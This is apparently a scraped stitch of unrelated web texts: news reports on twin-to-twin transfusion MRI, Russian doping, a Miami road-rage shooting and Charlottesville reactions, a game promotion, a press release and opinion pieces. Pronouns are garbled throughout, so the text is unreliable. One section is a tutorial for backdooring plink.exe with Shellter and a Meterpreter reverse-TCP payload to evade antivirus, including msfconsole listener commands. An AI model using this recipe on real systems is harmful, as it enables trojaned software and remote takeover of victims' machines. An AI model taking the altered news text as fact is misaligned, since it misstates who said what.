The rare condition occurs only in identical twins, when blood from one twin moves into the other. That can significantly reduce the supply in the twin that loses the blood, causing them or them to be born smaller than their sibling, and with paleness, anemia and dehydration. The twin that receives the blood may be born larger than the other twin with increased blood pressure that may lead to heart failure.
The video was made at London's Center for Fetal Care, according to Reuters, and the so-called cinematic-MRI the hospital used was able to pick up the pictures of what appears to be unborn twins fighting for space in mom's womb.
"We use MRI in twin-to-twin transfusion syndrome, not so much for diagnosing it, which can effectively be done on ultrasound but more for looking at the consequences of it," Dr. Marisa Taylor-Clarke of the Robert Steiner MR Unit at Imperial College London, told Reuters. "So one of the problems with the imbalances of blood flow is that if you get a sudden shift of blood from one twin to the other, that can cause brain injury, so it can cause stroke or hemorrhage in one or both of the twins' brains. MRI can pick up signs of brain injury much earlier and in much greater detail than ultrasound can at the moment," they explained.
In June, NewScientist first reported on the video and Taylor-Clarke's research.
"A lot of the so-called videos in the womb are very processed, so they do a lot of reconstructing and computer work afterwards," Taylor-Clarke told NewScientist at the time. "These are the raw images that are acquired immediately."
Are these two twins duking it out in the womb for extra legroom? Watch the video above and see for yourself.
To see another visually-impressive use of cinematic-MRI machines, see a video that captured a live birth.
LONDON (Reuters) - Athletics superpower Russia is running out of time to eradicate doping and may not be able to send a track and field team to this year's Rio Olympics, Dick Pound, chair of the World Anti-Doping Agency (WADA) independent commission, said on Wednesday.
World Anti-Doping Agency's (WADA) former president, Dick Pound, who heads the commission into corruption and doping in athletics, gestures at a news conference in Unterschleissheim near Munich, Germany, January 14, 2016. REUTERS/Michael Dalder
“There seems to be some evidence that they're just changing deck chairs on the Titanic,” they told an anti-doping conference.
Russian athletes were banned from international competition after a report by Pound's commission revealing widespread doping and corruption with involvement from Russian and international athletics officials.
Sweeping reforms of Russian athletics authorities were ordered to enable the ban to be lifted.
“My guess is Russia may not make it back for Rio. The IAAF and WADA are not going to risk their reputations by rolling over and playing dead,” Pound said, referring to the sport's world governing International Association of Athletics Federations.
Last week a German TV documentary contained fresh allegations of malpractice in Russia's anti-doping system.
Amongst the claims in Sunday's ARD program were that Russian coaches suspended in the worst corruption and doping scandal to hit the sport were still working in athletics, while others continued to provide banned substances to athletes.
“We said to them at the time if you stop complaining about the (WADA) report you have a chance. Whether their progress is sufficient enough? I don't think they are devoting all their time and energy into getting where they ought to be.
“We knew it would be a stretch for them but if they devoted themselves, heart and soul, to getting it done, it would be possible. Yet here we are four months later and I think somehow they must have convinced themselves that it would go away.
“Clearly it's not going to go away. Neither WADA nor the IAAF are going to buy a band-aid solution,” they told Reuters.
The ARD reports in recent months on doping in Russian sport were based on information provided by whistleblowers Vitaly Stepanov, who formerly worked for Russia's anti-doping agency, and their wife Yuliya, an 800 metres runner banned for doping.
FINANCIAL SUPPORT
WADA chairperson Craig Reedie, who also addressed delegates, said they had appealed to the IAAF and the International Olympic Committee to allow Yuliya to compete as an independent athlete in Rio.
Reedie said that contrary to media reports, WADA had also offered financial support and relocation to the Stepanovs who currently live in an undisclosed location outside Russia.
“For the record, I, WADA and the anti-doping community are very grateful,” Reedie said.
Branded as traitors at home, Vitaly, Yuliya and their young son have been in hiding since the documentary aired in December 2014. They have changed residences nine times and are living under assumed names.
“Without them it would have been a case of ‘Niet, not possible, it's lies'. They gave us hard evidence,” Pound said.
Russia, a superpower of the sport alongside the United States, will be allowed to return to competition, including August's Rio Olympics, when it proves to WADA and the IAAF that it has met a series of conditions regarding its anti-doping operation.
Although Reedie said Russia was co-operating, the key was an agreement for the country to fund two independent experts to rebuild its tainted anti-doping unit (RUSADA).
The doping and corruption scandal is amongst the worst in athletics history and has put into question lucrative global sponsorship deals as well as results and medal awards in past international competitions.
Related Coverage Sharapova drug prevalent in tennis, says former WADA chief
Reedie said more investment was needed in clean sport, saying WADA was ‘punching above its weight' on a budget of $30 million, about the same amount as a top tennis player can earn in endorsements each year.
“When you look at the damage being done to athletics, the damage to sport, I just wonder why very well resourced commercial companies might not think an investment in clean sport might pay dividends,” Reedie said.
“Nike know where I am, as do Adidas.”
Path of Exile has partnered with Twitch Prime to bring you the Purple Portal, Purple Weapon Effect and Purple Footprints for free when you subscribe to Twitch Prime! Until the 19th of June you'll be able to redeem these free cosmetic effects by starting a free one-month trial with Twitch Prime and linking your Path of Exile account to Twitch. What is Twitch Prime? Twitch Prime is a service which provides premium features that are exclusive to users who have an active Amazon Prime subscription. This includes advertising-free streaming, and monthly offers of free add-on content and game discounts. How do I get the Purple Portal, Purple Weapon Effect and Purple Footprints? If you are in one of the countries or territories recently added to Twitch Prime, you can get access to Twitch Prime through an Amazon Prime Video subscription in your country. What that means for you is, when you purchase an Amazon Prime Video subscription in a newly supported country or region, in addition to Amazon Prime Video benefits, you get Twitch Prime benefits at no extra cost! Amazon Prime Video benefits give you access to Amazon original content, exclusives and popular movies and hit TV shows.
Once you have an Amazon Prime or Prime Video account, you link it to your Twitch account and start taking advantage all the on-Twitch (ad-free Twitch viewing, custom emotes, special chat badges, and a free monthly channel subscription). As another plus, the free monthly sub lets you in on subscriber-only chat rooms (where available)! Awesome! To get started with Twitch Prime sign up for a free trial at twitchprime.com.
In most countries, you get Twitch Prime by being an Amazon Prime member and then linking your Amazon and Twitch Prime account. You can do all of this at twitchprime.com. Step 1 Sign up for a free trial of Twitch Prime.
Sign up for a free trial of Twitch Prime. Step 2 Create or logs in to your Path of Exile account.
Create or log in to your Path of Exile account. Step 3 Visit this page to link your account to Twitch or update your permissions if you've linked your account in the past.
Visit this page to link your account to Twitch or update your permissions if you've linked your account in the past. Step 4 Sign in to your Twitch account on twitch.tv and click the crown in the top right corner then claim the offer.
Sign in to your Twitch account on twitch.tv and click the crown in the top right corner then claim the offer. Step 5 That's it! Fulfilling this process should automatically grant the microtransactions to your account.
Who can Redeem this Offer? This promotion has become available to Path of Exile account holders in many new countries! If for some reason you miss out on the promotion, we plan to make these microtransactions available in the store at a later date. New to Path of Exile? Path of Exile is an online Action RPG set in the dark fantasy world of Wraeclast. It is designed around a strong online item economy, deep character customisation and competitive gameplay. The game is completely free and will never be "pay to win". If you're new to the game, here are some handy resources to get you started! Game Overview
Community Wiki
Official Forum
Community Discord Channel
Path of Exile subreddit
We also post news five days a week! Path of Exile on Twitch Path of Exile has an active base of community streamers. With your Twitch Prime subscription you'll be granted a free subscription to your favourite streamer! Be sure to check out our community streamers over on Twitch.
INDIANAPOLIS, April 27 (UPI) -- Sarah Palin took to the stage in Indianapolis Saturday to speak out against gun control legislation at the National Rifle Association's "Stand And Fight" gathering.
Speaking before a crowd of thousands at Lucas Oil stadium, Palin, who has embraced their role as a controversial figure since being thrust into the spotlight six years ago, spoke out against the Obama administration and Attorney General Eric Holder's efforts to curb gun use in the U.S.
“Do you know why those clownish little Kumbaya-humming fairytale-inhaling liberals want to be tough all of a sudden and control your guns?” the former Governor baited. “It's ‘cuz guys like [Sen.] Al Franken and [Senate Majority Leader] Harry Reid, they are not satisfied with just taking your money and your job, your truck and your property and your rights, your healthcare -- they didn't want to just stop at that.”
The speech eventually turned to national security, where Palin lamented a political climate they feel is growing too diplomatic with groups who may be associated with terrorists.
"Come on. Enemies, who would utterly annihilate America, they who'd obviously have information on plots, to carry out Jihad. Oh, but you can't offend them, can't make them feel uncomfortable, not even a smidgen. Well, if I were in charge, they would know that waterboarding is how we'd baptize terrorists."
A spokesperson for the NRA estimated about 12,000 tickets were sold for the event which concluded today with the National Gun Collectors awards ceremony.
A 19-year-old mother in the middle of a road-rage shooting was hit in the head and gravely wounded, their family said.
Alyssa Sanchez is in a medically induced coma after Monday's confrontation.
Sanchez was riding in their boyfriend's white Cadillac when they got into an argument with another driver just after midnight at Southwest 27th Avenue and 14th Street. The other driver fired five times at their boyfriend and one of the bullets hit Sanchez, said their brother, Lazaro Sanchez.
Police did not release information on what started the argument or whether the two drivers knew one another.
Sign Up and Save Get six months of free digital access to the Miami Herald
Sanchez and their boyfriend of one month, who was not identified, were heading to their home.
Sanchez was the only person shot, and the gunman is still at large, Miami police spokesperson Christopher Bess said.
After the shooting, Sanchez's boyfriend drove them to Ryder Trauma Center at Jackson Memorial Hospital in their Cadillac, which was peppered with bullet holes.
“I walked in and all I see is them on life support,” said Lazaro Sanchez, 23, of Homestead.
Doctors performed brain surgery Tuesday, and told their brother that they were able to move their hands and feet when they woke up.
“She's still in a coma,” they said. “But it's a good sign that they might have a possibility of living.”
This road rage incident is the latest in a spate of violent confrontations involving South Florida drivers. In recent weeks, a man used a bat to smash another driver's window in Hialeah, another was stabbed to death in Riviera Beach off Interstate 95 and a woman hurled coins at a man's face in Monroe County.
Monday's road-rage shooting adds to tragic pain for the Sanchez family.
Alyssa Sanchez's two children — both under 3 — lost their father last year when they were shot and killed, Lazaro Sanchez said.
“She's gone through so much. It's ridiculous. It's so sad.”
Sanchez's main priority was always “to spend time with their family,” their brother said.
“She loved their family,” they said. “She was just living life, taking care of their kids. She's so fun and lovable. They have such a good heart.”
Lazaro Sanchez said they are working with detectives to find the shooter.
“Somebody has to have seen something,” they said. “There are people in the streets 24/7. If anyone saw anything please say something. I've been the only one making moves.”
A GoFundMe page was set up by Lazaro Sanchez Thursday, which has raised around $400 as of Friday afternoon from friends and family to help foot medical bills.
The shooting remains under investigation by the Miami Police Department's homicide and assault units.
Captain's List — Makoto Nagano #100
Corsair's Profiles in Leadership Series
Corsair's Publishing Blocked Unblock Follow Jul 13, 2016
The captains of fiction and history have much to teach us. They are leaders who often serve in times of great challenge and turmoil. Articles in this series focus on an individual captain and utilizes their quotes, their writings, and their actions to inspire core leadership elements in all of us.
Captain Makoto Nagano
We have featured fictional characters and superheroes in this series. We have also examined Emperors and Field Marshals as they passed through the ranks of Captain. This article on Makoto Nagano is a bit different than any of those others. Nagano is not a fictional character but, at least in Japan, they are a bit of a superhero. If their name sounds familiar, you are likely a fan of Ninja Warrior (Sasuke in Japan).
Makoto Nagano is, in fact, the captain of a fishing vessel.  They are more well known as a Sasuke All-Star and Champion of Ninja Warrior. When it comes to leadership, they have a few things to teach us.
Training
Fans of Ninja Warrior will be well aware of the nature of that competition. For those who aren't, it is an obstacle course on steroids. Contestants compete to complete four challenging levels. Obstacles test speed, endurance, upper body strength, and agility with an array of challenges that vary from season to season and level by level. Many of these are also timed.
Through dozens of seasons of the show, only four contestants have ever completed the full course. Nagano is one of those four and in a separate attempt, failed the final level by only 0.11 seconds. Clearly it is a daunting task and one that requires a considerable amount of training.
While training is a sometimes overlooked attribute of professional development, especially outside of sports, it is also rarely associated with leadership. Nagano's innovative training techniques are an inspiration to Sasuke competitors and an iconic component of Ninja Warrior. Business leaders should strive to become role models in this same light.
Ingenuity
While today an entire industry has risen to train potential contestants and Ninja Warrior enthusiasts, this was not an option in those early years for the Captain of the Konpira Maru. So the King of Sasuke got creative. Nagano reportedly trains more than 300 days a year — on their boat! How is that for a little ingenuity?
Free Running or Parkour, as the sport is known, is widely viewed as a novel and versatile sport. Enthusiasts often use urban landscapes for their stunts and training, but Nagano is likely one of only a few who ever did so on a fishing boat. The wide availability of ropes on their ship was likely a huge advantage for competition and may explain why the first two men to finish Sasuke were both fishermen.
Ingenuity is more than just an attribute for your development team. Leader's need to showcase this sort of talent as well. A leader who is undaunted by challenges and finds creative means to overcome them will inspire their teams to do the same. This ingenuity will quickly provide a competitive advantage for you as well. Nagano's example is one that should inspire, it certainly did among the Sasuke All-Stars.
Training and ingenuity are important but often overlooked assets for leaders. The Sasuke competition emphasizes the advantages provided by those who excel at both. Nagano may go down in history as that sports the greatest competitor.  They are certainly likely to maintain their title as king. But what ever the case, this fishing boat captain is an excellent role model in leadership.
After passing through both the House and Senate, President Trump of Tuesday signed the latest National Defense Authorization Act (NDAA), which will see the US military spend $692 billion over the next year, plus any other emergency funding authorized beyond that.
The NDAA is far in excess to the level sought by President Trump originally. Trump sought a larger than usual spending increase, but hawks in both the House and Senate condemned it for being not big enough, then began tit-for-tat increases.
Trump presented the massive increase as in keeping with their campaign pledge to build up the already enormous US military, saying Congress also needs to end the sequester, even though the sequester has never actually been complied with a any rate.
Trump said the spending increase means a bunch of “brand new beautiful equipment” will be bought, and that it will be way better than anything the US military already has “by far.”In the signing statement, Trump suggested several NDAA provisions were objectionable given their own estimation of their power, and that they intended to ignore those provisions.
Last 5 posts by Jason Ditz
A total of 17 countries are now deemed by the Foreign Office to be entirely unsafe for tourists. Here they are, in alphabetical order...
1. Afghanistan
Why? "Hotels and guesthouses used by foreign nationals and the government of Afghanistan are subject to regular threats. The British Embassy doesn't allow official visitors to stay in hotels overnight and has placed restaurants and other venues off limits to staff. Make sure your accommodation is secure and review your security measures regularly. Terrorists are very likely to try to carry out attacks in Afghanistan. Specific methods of attack are evolving and increasing in sophistication."
What are tourists missing? The 65-metre Minaret of Jam, which dates back to the 12th century, is recognised by Unesco, while trekkers will be amazed by the Panjshir Valley and the Wakhan Corridor (pictured).
Story highlights "They hate white people, because white people are successful and they're not," Pittenger said
They later issued an apology over the remarks
Washington (CNN) A member of congress who represents North Carolina apologized Thursday for saying there are riots in Charlotte because the protesters "hate white people."
"The grievance in their mind is that the animus, the anger -- they hate white people, because white people are successful and they're not," Rep. Robert Pittenger, a Republican, said on the BBC's "Newsnight." "I mean, yes, it is, it is a welfare state. We have spent trillions of dollars on welfare, where we put people in bondage so that they cannot be all that they're capable of being."
Pittenger, who has represented North Carolina's ninth congressional district since 2013, emphasized that people come to the United States for opportunities, not government handouts.
"America is a country of opportunity and freedom and liberty," they said. "It didn't become that way because of a great government who provided everything for everyone, no."
Read More
Having trouble getting a Meterpreter shell past that pesky AV? Check out the new Shellter 5.1 shellcode injection tool! The latest version of Shellter for pentesters includes a “stealth” mode that retains the functionality of the original host program.
Shellter works by taking a legit Windows .exe file, adds the shell code to it and then does a great job of modifying the file for AV bypass. The program's automatic mode makes the whole process very pain free. In this tutorial I used Kali Linux 2.0 as the host and a Windows system as the target.
The new version of Shellter is not included in the repositories yet, so if you want the latest version you will need to download the zip file and install it manually.
So enough talk, let's see it in action!
(Note: As always, never attempt to access a system that you do not have express written permission to do so. Doing so is illegal and you could end up in jail.)
1. Download and install “shellter” ( https://www.shellterproject.com/download/ )
I saved the extracted folder to the /root/Desktop folder. You will need to make the shellter.exe file executable with the chmod command.
2. Grab “plink.exe” from Kali's ‘usr/share/windows-binaries' directory and copy it into the Shellter directory.
3. Change to the ‘/root/Desktop/shellter' directory.
4. Start Shellter – type, “wine shellter.exe”
5. Enter “A” for automatic
6. At the PE Target Prompt, enter “plink.exe”
7. When prompted to enable stealth mode enter “Y”:
This new feature allows the backdoored file to still function as originally file. A big help for Red Team pentesters.
8. When prompted for Payloads select “L” and then “1” for Meterpreter_Reverse_TCP.
9. Enter your Kali IP address for LHOST.
10. Enter a port to use (I used 4545)
Shellter will then add PolyMorphic code and Obfuscate the file. When done you will see:
You will now have a ‘plink.exe' (the shellcoded file) and ‘plink.exe.bak' (the original file) in the Shellter directory.
11. Now we need to start a listener service on the Kali system using the same settings from above:
start Metasploit (‘msfconsole' in a terminal)
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.39
set lport 4545
exploit
12. Copy the ‘plink.exe' file to the Windows system:
13. Now, in Windows, If you run plink.exe from the command prompt:
It lists the help information for the file, but does not trigger the remote shell yet. But if we actually use plink to connect to another system (a Raspberry Pi) as seen below:
Notice we get the Raspberry Pi ssh login prompt through Plink, but we also get a remote session to the Windows box:
We can run “sysinfo” to view information about the computer:
Success!
Conclusion
As you can see, a backdoored file that will bypass AV can be created pretty easily. AV is great but it can't stop everything, you need to train your company users to be vigilant when using internet sites, social media and e-mail. Avoid suspicious websites, don't allow website popups or warnings to install anything and never open unsolicited or suspicious attachments in e-mails. If you don't know if you should click on something, ask your IT department. A little user vigilance can go a long way at protecting your network!
If you enjoyed this tutorial, check out my new book, “Intermediate Security Testing with Kali Linux 2“.
Advertisements
Every time there's a mass shooting, it ignites the debate about whether guns make us more or less safe. And even though the NRA has been surprisingly silent since the Charleston massacre (but that will probably change within the next few days) they have plenty of surrogates running the virtues of the 'armed citizen' up the rhetorical flagpole, of which the latest is a story in the online Washington Times about how "a good guy with a gun stopped a bad guy, saving lives." The intro to the story says "With tragic events such as the shooting of a bible study group at a church in Charleston, South Carolina, the stories of heroic self defense and lives saved by legal gun owners are often overlooked." And we are then treated to eleven examples of what happened when bad guys were confronted by good guys carrying guns.
Before I review these 11 stories, bear in mind that whenever someone promotes the armed-citizen nonsense, there's usually some caveat about how the 'mainstream' media goes out of their way to diminish or entirely ignore all the wonderful things accomplished by good guys with guns. But since this story ran in the Washington Times, which promotes the NRA's viewpoint as if the Reverend Moon owned the NRA, I'm going to assume that these stories are the real deal and, if not an exhaustive compilation of good guy-bad guy episodes, at least give us some idea of how much and how often we can depend on our fellow armed citizens to protect us from all those nasties out there.
The first story concerns Jeanne Assam, who was something of a poster-girl for the CCW movement after they shot and killed a shooter outside of a Colorado Springs church following a Sunday service when congregants were heading for their cars. Actually, it turned out that the shooter committed suicide after being wounded by Assam's gunfire, but let's not quibble over details. The bottom line is that their actions may have saved the lives of other parishioners, so they deserve our recognition and our thanks.
But there's only one little problem with the story itself, namely, that it occurred in 2007. And if you take the trouble to read through all 11 accounts of armed citizens protecting someone else or just themselves, it turns out that only one of the episodes took place in 2015. In fact, one of the episodes took place in 2006, and in two other instances, the 'armed citizens' turned out to be professional security guards or cops. So what the story gets down to is, in fact, exactly nine examples of good guys protecting us from bad guys over a period of nine years.
Now you would think that in a country which, according to John Lott's estimate, has issued more than 11 million concealed-carry permits, that the Washington Times could dig up more than nine stories to prove that bad guys are only stopped by good guys carrying guns. So I went to the real fount of knowledge when it comes to the benefits of concealed-carry, namely, the NRA, which has been publishing examples of good guys stopping bad guys since 1958. Here's how they put it: "The NRA Armed Citizen® stories highlight accounts of law-abiding gun owners in America using their Second Amendment rights to defend self, home and family."
Ohio Gov. John Kasich responds to reporters as they arrive at the White House Feb. 24 for a meeting with President Donald Trump. Kasich advocated for keeping Medicaid expansion as part of any Obamacare replacement. (AP Photo/Evan Vucci) (Photo: Evan Vucci, AP)
John Kasich called on President Donald Trump to "condemn" white supremacists and neo-Nazis after their "pathetic" march on Charlottesville, Virginia, turned violent last weekend.
"Pathetic, isn't it?" Kasich launched in, not waiting for a question from their hosts on NBC's "Today."
"To somehow draw some kind of equivalency to somebody else reduces the ability to totally condemn these hate groups," Kasich said of Trump's renewed insistence Tuesday that "both sides" were to blame for violence in Charlottesville. Kasich has condemned only the white supremacists.
The Charlottesville rally ended with the death of one woman and injuries to at least 19, police say, at the hand of an Ohio man said to have neo-Nazi views. Authorities say James Alex Fields Jr., of Maumee, drove their car into a group of anti-fascists staging a counter-protest at the white supremacists' rally.
After initially blaming "many sides" for the Charlottesville violence, Trump on Monday called out white supremacists, then reconsidered. Some "alt-left" counter-protesters were also to blame, Trump said Tuesday, and some "very fine people" were demonstrating on both sides in Charlottesville.
The ideology of white supremacy is wrong, evil, and repulsive. Simply put, there should be no place for it in our country. (1/3) — U.S. Rep. Bob Latta (@boblatta) August 15, 2017
Trump's approach reduces the presidency to "another CEO job" from the most important job in the country, Kasich said. "There is a bitterness setting in that may not be able to be removed," Kasich said. "He's got to fix this, and Republicans have got to speak out."
Kasich is a long-term critic of Trump. They ran against Trump for the GOP nomination in 2016, wrote a book this year contrasting their approaches with those of Trump and has spoken out repeatedly against Trump's policies and words as president. Kasich's allies are sustaining speculation the Ohio governor may run again in 2020, even if that means taking on Trump.
So their condemnation of Trump's actions come as no surprise. What is different this time: some rank-and-file Republicans in Congress are speaking out against Trump, although with differing degrees of directness.
Rep. Steve Chabot, R-Westwood, also took issue with Trump's comments defending the white supremacists and equating the counter-protesters with the hate groups.
"No, there is not a moral equivalence between neo-Nazi groups and those who protest them,” Chabot said in a statement to the Enquirer. “However, violence in response to speech is never acceptable and never the answer."
In a blog post on Wednesday, Chabot said Trump should have called out the neo-Nazis and other white supremacists in their first statement on Saturday, when Trump blamed “many sides.” But Chabot also argued that “The Left and much of the mainstream media” would have criticized Trump even if the president had condemned the hate groups from the start.
“He will be the bad guy in virtually every story for the next 3 ½ or 7 ½ years,” Chabot wrote. “In order for The Left to win, they must destroy this President, and anyone who supports him.”
Sen. Rob Portman, R-Ohio, issued a series of tweets condemning bigotry and "the white supremacists who descended" on Charlottesville, but they have not directly addressed Trump's comments.
NEWSLETTERS Get the News Alerts newsletter delivered to your inbox We're sorry, but something went wrong Be the first to be informed of important news as it happens in Greater Cincinnati. Please try again soon, or contact Customer Service at 1-800-876-4500. Delivery: Varies Invalid email address Thank you! You're almost signed up for News Alerts Keep an eye out for an email to confirm your newsletter registration. More newsletters
The region's only Democrat in Congress, Sen. Sherrod Brown, flatly rejected Trump's assertion that "many sides" were to blame for the violence in Charlottesville.
"There are not ‘many sides' to blame for # Charlottesville. There is right and wrong. White nationalism, hatred and bigotry are wrong," Brown tweeted on Saturday.
Rep. Brad Wenstrup, R-Columbia Tusculum, said there was only one side at fault.
“The terror in Charlottesville was, without a doubt, carried out by white supremacists," they said. "White nationalists, Neo-Nazis or any brand of hatred and bigotry should be universally condemned along with their acts of violence.”
Other area lawmakers have not yet responded to the Enquirer's requests for comment.
Cong. Rs all over the place. Portman condemns white supremacists, doesn't address Trump. Chabot doesn't want KKK in GOP -- or their votes 5/ — Chrissie Thompson (@CThompsonENQ) August 16, 2017
We must speak out clearly against the hatred, racism and white supremacists who descended upon #Charlottesville. — Rob Portman (@senrobportman) August 15, 2017
Stiver says they don't get what's so hard abt not defending neo-Nazis. Most direct: this burn from Tiberi 6/ https://t.co/5VyE4nb8iU — Chrissie Thompson (@CThompsonENQ) August 16, 2017
The Enquirer will update this story.
Contributing: Deirdre Shesgreen
Read or Share this story: http://cin.ci/2waHygP
This article is over 1 year old
Rhiannon is yet to announce whether they will recontest preselection following their temporary suspension from party room
Australia's first female Muslim MP, Mehreen Faruqi, will run for Greens preselection for the Senate in 2019 – setting up a potential challenge to the controversial sitting senator Lee Rhiannon.
Rhiannon is yet to announce whether they will recontest preselection but the move will place extra pressure on them to announce their intentions.
It comes just a month after they were temporarily suspended from their party room by their colleagues for derailing school funding negotiations during the Gonski 2.0 debate.
The Australian Greens are in crisis: will Doctor Di Natale take radical action? | Katharine Murphy Read more
The division deepened when Rhiannon criticised Richard Di Natale's leadership, which they described as “disappointing”.
Faruqi, who is a member of the New South Wales legislative council, confirmed on Facebook their intention to run in the preselection, nominating climate change, economic equality and the resurgence of the far right as their main policy drivers.
“Today I'm announcing that I will be putting my hand up to become the next Greens senator from NSW,” Faruqi said. “Our core belief in fairness is why I joined the Greens 13 years ago when I was living in regional NSW.
“For too long, vested interests and big corporations have dictated public policy in Australia, leading to detrimental outcomes when it comes to both our society and the environment.
“The growing threats of economic inequality and climate change demand an urgent response. The Greens have the ideas and energy to tackle the challenges Australia is facing and I want to help lead our response.”
Faruqi, an engineer who was born in Pakistan, said they would use a future Senate to argue for cultural diversity.
“The far-right have unfortunately found a home in federal parliament in recent years, through the resurgence of Pauline Hanson's One Nation,” Faruqi said. “I'm looking forward to the opportunity of taking the fight to Hanson and putting forward the case for a diverse and culturally rich Australia.”
Greens' Jordon Steele-John, aged 22, set to become the youngest Australian senator Read more
The move is sure to ramp up the internal divisions within the Greens, following the unprecedented move against Rhiannon in the party room last month and the criticism of them by former leaders Bob Brown and Christine Milne.
Rhiannon has been a federal senator since 2010 and is due for re-election at the next federal election on or before 2019.
Rhiannon has not made it clear publicly whether they intend to run. They told Fairfax Media: “My plans are on track for the next Greens NSW Senate preselection.”
The preselection is due in October or November but it is understood that the timeline has not been confirmed.
Under the NSW Greens' rules, members are forbidden to speak about preselections. A senior Greens source said Faruqi had been widely seen as Rhiannon's natural successor in the Senate.
“While Mehreen will no doubt be a staunch defender of NSW Greens, they do not bring all the old baggage from decades of a conflict with Bob Brown and the Australian Greens,” the source said.
“Her candidacy represents a path forward for the party. She's been a strong and indefatigable campaigner against racism and Islamophobia, so they will be a good pick to take on Peter Dutton and Pauline Hanson directly in federal parliament.”
However, other sources said Rhiannon was a stronger campaigner than Faruqi.
A recent survey conducted for The New York Times shows a correlation between American attitudes toward North Korea and respondent's ability to identify the country on a map.
Results of the survey were released following a ballistic missile test by North Korea on Sunday in which the missile reached high altitudes before landing in the Sea of Japan.
The survey of 1,746 American adults was conducted for the Times by Kyle Dropp of the research firm Morning Consult from April 27-29. Only 36 percent of respondents correctly located North Korea on a map.
In addition to the mapping, respondents were asked about which policies they believe the U.S. should take on regarding North Korea. Their responses deviated based largely upon whether or not they could identify the country's location.
Respondents who could identify the country largely supported diplomatic and non-military strategies verses those who could not locate it. While a majority of both groups did not support direct military action, significantly more respondents who could not locate North Korea supported sending in ground troops. That same group was also much more likely to disapprove of the U.S. doing nothing with North Korea than the group that could identify its location. The diplomatic and non-military strategies largely supported by those who could locate North Korea included imposing further economic sanctions, increasing pressure on China to influence North Korea and conducting cyberattacks against military targets.
JACKSONVILLE, Fla. - A Jacksonville mother was arrested Tuesday after they struck a special needs child with a belt because they ate sausage that they were not supposed to eat, the Jacksonville Sheriff's Office said.
Victoria Connie Young, 29, is charged with child abuse.
According to the arrest report, school personnel contacted the Department of Children and Families after noticing a boy had several severe wounds on their body.
The boy told police that after school last Friday, they ate sausage that they were not supposed to eat. When Young found out, they said, “You need a whooping,” then struck the boy with an open belt several times, the buckle hitting their body, according to police.
Investigators said the boy had several large scabbed-over wounds – one on their upper chest, three on the left side of their back and one on their left leg.
The Department of Children and Families was notified and will be investigating the incident.
A DCF spokesperson told News4Jax Thursday that there are other children under the age of 9 living in the home who have since been place in the care of relatives.
According to court records, Young was arrested for child abuse in 2014, but the charge was dropped.
 They are being held at the Duval County Jail on a $20,000 bond.
Copyright 2016 by WJXT News4Jax - All rights reserved.
The White House closed its public comment lines, so activists launched a tool to call Trump properties instead
Revolution Messaging's White House Inc is a tool that connects your phone to the main switchboard of a random Trump property somewhere in the world, because "Until Trump steps away from their businesses for real, their property is no different from the Oval Office."
The White House closed its public comments line has been closed for four days now; Trump says that people who want to leave a comment for the President can write a Facebook message instead.
Revolution Messaging -- the digital arm of the Bernie Sanders campaign -- suggests that you use their tool to "tell management that until Trump steps away from their businesses for real, their property is no different from the Oval Office and you want to talk about the issues that matter most," like the assault on women's health; building the stupid wall; repealing Obamacare and leaving 22 million people without insurance; and failing to take action on student debt.
Back in November, Trump said he'd announce their plans for their business on December 15. We're still waiting. So far, there is no indication that he'd actually be selling their business and divesting their family's stake. If they sold their business, how would foreign leaders show them that they care by staying in their resorts and greenlighting new projects around the globe? How would you and I show our patriotism by donning our Chinese-made Trump neck ties and shopping Ivanka's looks from their meetings with foreign leaders – business partners? LET'S USE THIS CRITICAL TIME TO SHOW TRUMP WE NEED THESE SATELLITE WHITE HOUSES MORE THAN EVER. POUR YOURSELF A LITTLE TRUMP VODKA AND CALL WHITE HOUSE INC. TODAY!
White House Inc
Bernie Sanders' digital team offers a way for people to call the White House
[Sasha Lekach/Mashable]
(via Naked Capitalism)
Maple Street Biscuit Company, voted one of the Best New Biscuit Spots in the country by Food & Wine Magazine, will soon be opening their first Gainesville location in the first quarter of 2016. Front Street Commercial Real Estate Group represented Maple Street in this transaction to secure their new location at Butler Plaza. The new Gainesville location represents Maple Street's eighth opening and is the second location that Front Street has facilitated.
Maple Street was started by Scott Moore and Gus Evans of Jacksonville, Florida. They opened their doors in late 2012 and have lived true to their values of consistent, Southern, comfort food with a modern twist, immaculately clean stores, and gracious service. Their success has been tremendous and has not gone unnoticed. They were featured in Forbes Magazine's article “Trends Next Year In Food And Nutrition,” listed on USA Today's “10 Best” list for Best Restaurants, voted in the top 100 restaurants in the nation by Urbanspoon, awarded the Gold Spoon Award for best new restaurant in Florida Trend Magazine, and recently featured on the Food Network's hit show “Guilty Pleasures” in November of 2015.
“The demand in our market for new and exciting breakfast concepts is stronger than ever,” said Jason Hurst, associate director of Front Street Commercial Real Estate Group. They added, “It's a very rewarding experience to facilitate such great growth of a fantastic company, and to help bring new brands like Maple Street to our community.” Cory Presnick, vice president of Butler Enterprises mentioned “We are extremely excited to be a part of bringing Maple Street Biscuit Company to the Gainesville community. Their focus on high quality, fresh, ingredients along with their strong core values and focus on community will be a proud addition to Butler Plaza and greater Gainesville.” They went on to mention “Maple Street's recent recognition by the Food Network is proof of their strongly growing place in a continuously budding food culture and we hope their success will spur even more local and entrepreneurial groups to bring more authenticity and local flavor to the Gainesville food scene.”
For more information, please contact Nick Banks at nickb@frontstreet.net or 352.505.3884.
ABOUT FRONT STREET:
Front Street Commercial Real Estate Group is a leader in the Central and North Central Florida commercial real estate business. The company's mission is to impact its community, clients and industry by doing commercial real estate differently. Front Street is committed to leadership in the commercial real estate business by offering superior brokerage, commercial mortgage banking and property management solutions to its commercial real estate clients. For more information please visit www.FrontStreet.net.
ABOUT MAPLE STREET BISCUIT COMPANY:
Maple Street Biscuit Company was started by Scott Moore and Gus Evans in Jacksonville, Florida on November 8, 2012 to a community with open arms and hungry tummies. They now have a total of eight locations; one in Tallahassee, four in Jacksonville, one in Chattanooga, TN, and soon to be opening in Gainesville and St. Augustine. Maple Street's mission is to make a difference and be a part of the community. Maple Street's key core values are; consistent Southern comfort food with a modern twist, immaculately clean stores, and gracious service. For more information on Maple Street, visit www.maplestreetbiscuits.com. Find and follow Maple Street Biscuit Company on Facebook at www.facebook.com/MapleStreetBiscuits.
Click here for more Front Street news...
Submitted by Thad Beversdorf via FirstRebuttal.com,
